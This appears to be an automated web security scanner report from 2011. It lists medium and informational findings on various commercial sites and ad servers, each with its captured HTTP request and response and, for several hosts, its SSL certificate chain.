HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: SessionStateGUID=819ade93 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 10347 <img src='../images/tnlogo.gif <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Tax Notebook</title> <link href="../Main.css" typ ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.taxnotebook |
Path: | /tnstart.asp |
GET /tnstart.asp?welcome Host: www.taxnotebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Object moved Date: Sat, 07 May 2011 01:44:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: Login/TNLogin.aspx Content-Length: 139 Content-Type: text/html Set-Cookie: refaccno=759456; path=/ Set-Cookie: ASPSESSIONIDCSTDRTTC Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="Login/TNLogin.aspx" |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.trpc401k.com |
Path: | / |
GET / HTTP/1.1 Host: www.trpc401k.com Connection: keep-alive Referer: http://www.trpcweb.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:45:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: ASP.NET_SessionId Set-Cookie: QTWEB=CSS=BLUE3-NS.css Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 12169 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <head> <META http-equiv="Content-Type" content="text/html"> <meta http-equiv="Content-Type" content= ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=fbak& Host: www.expedia.com Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:40:52 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX018 Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 155628 <META HTTP-EQUIV="Content-Type" content="text/html; c ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.gofileroom |
Path: | /lbmc |
GET /lbmc HTTP/1.1 Host: www.gofileroom.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Content-Length: 154 Content-Type: text/html Location: http://www.gofileroom.com X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:44:04 GMT Set-Cookie: BIGipServerGFR_WWW_HTTP <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.paypal.com |
Path: | /en_US/i/btn/btn |
GET /en_US/i/btn/btn Host: www.paypal.com Connection: keep-alive Referer: http://www.clone-systems User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:56:08 GMT Server: Apache Set-Cookie: Apache=10.191.114.122 Last-Modified: Tue, 23 Oct 2007 03:08:13 GMT Accept-Ranges: bytes Content-Length: 3091 Strict-Transport-Security Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..*....OXS........{ ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://ads.adonion.com |
Path: | /serving/showbanner.php |
GET /serving/showbanner.php Host: ads.adonion.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:03:52 GMT Server: Apache/2.2.17 (Fedora) X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Cache-Control: no-cache, must-revalidate Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Advertisement< <meta http-equiv="Content ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://bh.contextweb.com |
Path: | /bh/set.aspx |
GET /bh/set.aspx?action=add Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pb_rtb_ev=1:535495 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web84 Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Mon, 30-Apr-2012 22:33:36 GMT; Path=/ Set-Cookie: cwbh1=541%3B05%2F24 Content-Type: image/gif Date: Fri, 06 May 2011 22:33:35 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://broker.gotoassist |
Path: | /ds/queryPost.flow |
GET /ds/queryPost.flow Host: broker.gotoassist.com Connection: keep-alive Referer: https://broker.gotoassist User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dtsSession=SessionInfo |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:03 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 7600 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>GoToAssist: live online customer support</title> <script language="JavaScript"> <!-- function empty ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://broker.gotoassist |
Path: | /javaScriptTester.tmpl |
GET /javaScriptTester.tmpl Host: broker.gotoassist.com Connection: keep-alive Referer: https://broker.gotoassist User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dtsSession=SessionInfo |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:43:54 GMT Server: Apache Content-Length: 3 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 OK |
Severity: | Medium |
Confidence: | Firm |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=2588783 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Fri, 06 May 2011 22:33:33 GMT Expires: Fri, 06 May 2011 22:33:33 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html X-XSS-Protection: 1; mode=block Content-Length: 975 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <!-- ContextWeb Pixel: TargetCast --> <img src="http://bh.contextweb ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://iqavu79a908u5 |
Path: | /ps/ifr |
GET /ps/ifr?container Host: iqavu79a908u5vcecp0p Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Location: http://iqavu79a908u5 Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 21:10:04 GMT Expires: Fri, 06 May 2011 21:10:04 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 875 <HTML> <HEAD> <TITLE>Moved Temporarily</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000"> <H1>Moved Temporarily</H1> The document has moved <A HREF="http://iqavu79 ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://k830suiki828g |
Path: | /ps/ifr |
GET /ps/ifr?container Host: k830suiki828goudg944 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Location: http://k830suiki828g Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 21:13:03 GMT Expires: Fri, 06 May 2011 21:13:03 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 1002 <HTML> <HEAD> <TITLE>Moved Temporarily</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000"> <H1>Moved Temporarily</H1> The document has moved <A HREF="http://k830sui ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://l.sharethis.com |
Path: | /pview |
GET /pview?event=pview Host: l.sharethis.com Proxy-Connection: keep-alive Referer: http://www.complianc User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=CspT702sdV9LL |
HTTP/1.1 204 No Content Server: nginx/0.7.65 Date: Sat, 07 May 2011 01:21:37 GMT Connection: keep-alive |
Severity: | Medium |
Confidence: | Firm |
Host: | http://r1rk9np7bpcsf |
Path: | /ps/ifr |
GET /ps/ifr?container Host: r1rk9np7bpcsfoeekl0k Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Location: http://r1rk9np7bpcsf Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 21:06:47 GMT Expires: Fri, 06 May 2011 21:06:47 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 825 <HTML> <HEAD> <TITLE>Moved Temporarily</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000"> <H1>Moved Temporarily</H1> The document has moved <A HREF="http://r1rk9np ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://sales.liveperson |
Path: | /hc/56727252/ |
GET /hc/56727252/?&visitor Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.dynamicpe User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: HumanClickKEY=324741 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:16:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sat, 07 May 2011 01:16:36 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({ |
Severity: | Medium |
Confidence: | Firm |
Host: | https://support.trust |
Path: | /visitor/index.php |
GET /visitor/index.php?_m Host: support.trust-guard.com Connection: keep-alive Referer: https://www.trust-guard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:49:44 GMT Server: Apache/1.3.41 Ben-SSL/1.59 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache X-Powered-By: PHP/5.2.17 Set-Cookie: SWIFT_visitor=a%3A4%3A Last-Modified: Sat, 07 May 2011 00:49:44 GMT Keep-Alive: timeout=2, max=200 Connection: Keep-Alive Content-Type: image/gif Content-Length: 44 GIF89a.............!..... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: campaign_click_url= |
HTTP/1.1 302 Found Location: http://static.ak.fbcdn Content-Type: text/html; charset=utf-8 X-FB-Server: 10.42.87.63 X-Cnection: close Date: Fri, 06 May 2011 22:33:42 GMT Content-Length: 0 |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.networkso |
Path: | /legal/SSL-legal |
GET /legal/SSL-legal Host: www.networksolutions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Sat, 07 May 2011 01:16:25 GMT Set-cookie: JSESSIONID=806e2d4ca X-powered-by: Servlet/2.5 Set-cookie: JROUTE=8y5l; Version=1; Comment=Sun+ONE Set-cookie: vrsnsf=806e2d4caa6cc Set-cookie: siteId=46064838-12; Expires=Tue, 01-May-2012 01:16:25 GMT; Path=/ Content-type: text/html;charset=UTF-8 Date: Sat, 07 May 2011 01:16:25 GMT Vary: accept-encoding Content-Length: 44952 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <head> <title>Legal | Network Solutions</title> <meta http-equiv="content-type" conte ...[SNIP]... <div class="logo"><a href="/;jsessionid ...[SNIP]... <li id="c-deals"><a href="/promotions-and ...[SNIP]... <li id="c-renew"><a href="/manage-it/bulk ...[SNIP]... <div><a href="/manage-it/index ...[SNIP]... <li class="noLeftLine"><a href="/help/index.jsp ...[SNIP]... <li class="noRighLine"><a href="/affiliate-program ...[SNIP]... <li class="noRighLine"><a href="/reseller-program ...[SNIP]... <li class="navItem first"> <a href="/domain-name ...[SNIP]... <li class="first"><a href="/domain-name ...[SNIP]... <li><a href="/domain-name ...[SNIP]... <li><a href="/build-it ...[SNIP]... <li><a href="/domain-transfer ...[SNIP]... <li class="cap all"><a href="/domain-name ...[SNIP]... <li class="navItem"> <a href="/create-a-website ...[SNIP]... <li class="first"><a href="/create-a-website ...[SNIP]... <li><a href="/free-website/index ...[SNIP]... <li><a href="/mobile-website ...[SNIP]... <li><a href="/e-commerce/index ...[SNIP]... <li class="cap"><a href="/small-business ...[SNIP]... <li class="navItem"> <a href="/web-hosting/index ...[SNIP]... <li class="first"><a href="/web-hosting/index ...[SNIP]... <li><a href="/web-hosting ...[SNIP]... <li><a href="/web-hosting ...[SNIP]... <li><a href="/vps/index.jsp ...[SNIP]... <li class="cap"><a href="/web-hosting ...[SNIP]... <li class="navItem"> <a href="/email-account ...[SNIP]... <li class="first"><a href="/email-account ...[SNIP]... <li><a href="/email-account ...[SNIP]... <li class="cap"><a href="/email-account ...[SNIP]... <li class="navItem"> <a href="/e-commerce/index ...[SNIP]... <li class="first"><a href="/e-commerce/index ...[SNIP]... <li class="cap"><a href="/merchant-accounts ...[SNIP]... <li class="navItem"> <a href="/SSL-certificates ...[SNIP]... <li class="first"><a href="/SSL-certificates ...[SNIP]... <li><a href="/security-suite ...[SNIP]... <li><a href="/security-suite ...[SNIP]... <li class="cap"><a href="/security-suite ...[SNIP]... <li class="navItem"> <a href="/online-marketing ...[SNIP]... <li class="first"><a href="/search-engine ...[SNIP]... <li><a href="/search-engine ...[SNIP]... <li><a href="/pay-per-click ...[SNIP]... <li><a href="/email-marketing ...[SNIP]... <li><a href="/press-release ...[SNIP]... <li class="cap"><a href="/online-marketing ...[SNIP]... <li class="navItem"> <a href="/design-develop ...[SNIP]... <li class="first"><a href="/web-design ...[SNIP]... <li><a href="/e-commerce/web ...[SNIP]... <li><a href="/design-develop ...[SNIP]... <li><a href="/custom-logo-design ...[SNIP]... <li><a href="/design-develop ...[SNIP]... <li><a href="/design-develop ...[SNIP]... <li><a href="/mytime-support ...[SNIP]... <li class="cap"><a href="/design-develop ...[SNIP]... <li class="navItem cap"> <a href="/mobile-services ...[SNIP]... <li class="first"><a href="/mobile-website ...[SNIP]... <li><a href="/mobile-services ...[SNIP]... <li><a href="/mobile-services ...[SNIP]... <li><a href="/mobile-services ...[SNIP]... <li class="cap"><a href="/mobile-services ...[SNIP]... <!-- sfc:wms begin pageName=/legal/SSL-legal ...[SNIP]... </span> <a href="/legal/index.jsp ...[SNIP]... <div class="userStatus"> <a href="/manage-it/index ...[SNIP]... <li><a href="/legal/legal-notice ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/legal/privacy ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="/legal/aup.jsp ...[SNIP]... <li><a href="/legal/SSL-legal ...[SNIP]... <li><a href="/legal/SSL-legal ...[SNIP]... <li><a href="/legal/SSL-legal ...[SNIP]... <li><a href="/legal/SSL-legal ...[SNIP]... <li><a href="/legal/SSL-legal ...[SNIP]... <li><a href="/legal/SSL-legal ...[SNIP]... <li><a href="/legal/privacy ...[SNIP]... <li><a href="/legal/legal-notice ...[SNIP]... <li><a href="/legal/static ...[SNIP]... <li><a href="/site-map/index.jsp ...[SNIP]... |
Severity: | Medium |
Confidence: | Certain |
Host: | https://secure.opinionlab |
Path: | / |
Issued to: | *.opinionlab.com |
Issued by: | DigiCert High Assurance CA-3 |
Valid from: | Mon Jun 15 19:00:00 CDT 2009 |
Valid to: | Mon Jul 11 18:59:59 CDT 2011 |
Issued to: | DigiCert High Assurance CA-3 |
Issued by: | DigiCert High Assurance EV Root CA |
Valid from: | Mon Apr 02 19:00:00 CDT 2007 |
Valid to: | Sat Apr 02 19:00:00 CDT 2022 |
Issued to: | DigiCert High Assurance EV Root CA |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Sun Oct 01 00:00:00 CDT 2006 |
Valid to: | Sat Jul 26 13:15:15 CDT 2014 |
Issued to: | Entrust.net Secure Server Certification Authority |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Tue May 25 11:09:40 CDT 1999 |
Valid to: | Sat May 25 11:39:40 CDT 2019 |
Severity: | Medium |
Confidence: | Certain |
Host: | https://www.clone-systems |
Path: | / |
Issued to: | www.clone-systems.com |
Issued by: | Network Solutions EV SSL CA |
Valid from: | Tue Aug 24 19:00:00 CDT 2010 |
Valid to: | Sat Aug 25 18:59:59 CDT 2012 |
Issued to: | Network Solutions EV SSL CA |
Issued by: | Network Solutions Certificate Authority |
Valid from: | Thu Nov 30 18:00:00 CST 2006 |
Valid to: | Tue Dec 31 17:59:59 CST 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://broker.gotoassist |
Path: | / |
Issued to: | broker.gotoassist.com |
Issued by: | VeriSign Class 3 Extended Validation SSL CA |
Valid from: | Thu Jun 10 19:00:00 CDT 2010 |
Valid to: | Thu Jun 30 18:59:59 CDT 2011 |
Issued to: | VeriSign Class 3 Extended Validation SSL CA |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Mon Nov 07 17:59:59 CST 2016 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Sun Nov 07 17:59:59 CST 2021 |
Issued to: | Class 3 Public Primary Certification Authority |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Sun Jan 28 18:00:00 CST 1996 |
Valid to: | Wed Aug 02 18:59:59 CDT 2028 |
Severity: | Information |
Confidence: | Certain |
Host: | https://events.gsmiweb |
Path: | / |
Issued to: | events.gsmiweb.com |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Sun Nov 21 18:00:00 CST 2010 |
Valid to: | Sun Nov 22 17:59:59 CST 2015 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://mosaicsecurity |
Path: | / |
Issued to: | mosaicsecurity.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Fri Nov 12 21:28:44 CST 2010 |
Valid to: | Sat Nov 12 21:28:44 CST 2011 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://portal.lbmc.net |
Path: | / |
Issued to: | portal.lbmc.net |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Wed Jul 23 12:13:08 CDT 2008 |
Valid to: | Tue Oct 04 16:04:27 CDT 2011 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://seal.network |
Path: | / |
Issued to: | seal.networksolutions.com |
Issued by: | Network Solutions Certificate Authority |
Valid from: | Tue Jan 05 18:00:00 CST 2010 |
Valid to: | Wed Jan 22 17:59:59 CST 2014 |
Issued to: | Network Solutions Certificate Authority |
Issued by: | UTN-USERFirst-Hardware |
Valid from: | Sun Apr 09 19:00:00 CDT 2006 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | UTN-USERFirst-Hardware |
Issued by: | AddTrust External CA Root |
Valid from: | Tue Jun 07 03:09:10 CDT 2005 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://seals.networ |
Path: | / |
Issued to: | seals.networksolutions.com |
Issued by: | Network Solutions Certificate Authority |
Valid from: | Tue Feb 05 18:00:00 CST 2008 |
Valid to: | Sun Feb 26 17:59:59 CST 2012 |
Issued to: | Network Solutions Certificate Authority |
Issued by: | UTN-USERFirst-Hardware |
Valid from: | Sun Apr 09 19:00:00 CDT 2006 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | UTN-USERFirst-Hardware |
Issued by: | AddTrust External CA Root |
Valid from: | Tue Jun 07 03:09:10 CDT 2005 |
